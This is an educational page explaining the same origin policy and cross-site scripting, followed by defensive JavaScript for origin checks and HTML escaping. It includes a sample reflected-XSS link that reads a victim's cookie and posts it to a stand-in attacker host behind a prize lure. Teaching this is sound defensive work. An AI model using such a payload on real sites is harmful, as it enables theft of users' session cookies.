XSS Cross Site Scripting

Same Origin Policy

The same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript.

The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages received from different sites.

A strict separation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity.

The term "origin" is defined by the application-layer protocol (the scheme), the domain name (the host), and (in most browsers) the TCP port of the HTML document running the script.

Two resources are considered to be of the same origin if and only if all these values are exactly the same.

Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability, typically found in web applications, that enables malicious attackers to inject client-side script into web pages viewed by other users. In the example below, the link's name parameter carries a form and a script; if g.jsp echoes that parameter into its page without encoding it, the script runs under the example.com origin and submits the victim's document.cookie to www.cookie-thief.com.

	…
<a href=http://example.com/g.jsp?name=
  <FORM action=http://www.cookie-thief.com/xx.jsp
       method=post id="idForm">
       <INPUT name="cookie" type="hidden">
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie; 
    idForm.submit();
  </SCRIPT> >Click here to win a million dollars!</a>
		…
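The two definitions above, as an added example that is not part of the original page: a same-origin check that compares scheme, host and port exactly as described, and the output encoding that would keep the g.jsp example from treating the name parameter as markup. The renderGreeting functions are a hypothetical stand-in for g.jsp; the sample input is constructed.

```javascript
// Added example (not from the original page). Runs in Node.js or a browser;
// the URL class is built in to both.

// Default ports, so "http://a.com" and "http://a.com:80" compare as equal,
// which is how browsers treat them. URL.port is "" when the default is used.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

function originOf(href) {
  const u = new URL(href);
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return { scheme: u.protocol, host: u.hostname, port };
}

// Same origin if and only if all three values match (the page's definition).
function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Output encoding for an HTML text context: every character that can open a
// tag or attribute becomes an entity, so the browser renders it as text.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => HTML_ENTITIES[c]);
}

// Hypothetical rendering of the g.jsp page. The vulnerable version echoes
// the name parameter raw (reflected XSS); the fixed version encodes it first.
function renderGreetingVulnerable(name) {
  return "<p>Hello, " + name + "</p>";
}
function renderGreetingFixed(name) {
  return "<p>Hello, " + escapeHtml(name) + "</p>";
}

// Constructed sample input: a shortened form of the page's payload.
const SAMPLE_NAME = "<SCRIPT>idForm.cookie.value=document.cookie;</SCRIPT>";

// Detection helper: does the rendered page still contain a script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

With SAMPLE_NAME, renderGreetingVulnerable() still contains a script tag while renderGreetingFixed() does not, and the cookie-thief URL from the example is a different origin from example.com.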